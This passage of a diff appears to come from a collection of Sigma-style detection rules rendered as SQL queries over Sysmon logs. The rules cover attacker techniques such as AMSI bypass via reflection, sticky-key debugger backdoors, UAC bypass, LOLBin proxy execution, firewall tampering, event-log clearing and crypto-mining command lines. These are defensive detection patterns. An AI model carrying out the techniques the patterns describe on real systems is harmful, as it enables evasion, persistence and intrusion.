The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate WinRM usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE 
'%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", - "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1218", + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "status": "experimental", + "description": "Detects suspicious execution of 
Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects specific process parameters as used by 
ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. 
Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "status": "experimental", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 
'%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "File Deletion Via Del", - "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "status": "experimental", - "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "status": "test", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting 
network usage", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.004" ], "falsepositives": [ - "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" + "Legitimate administration activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_execution.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": 
"Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1557.001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Legitimate 
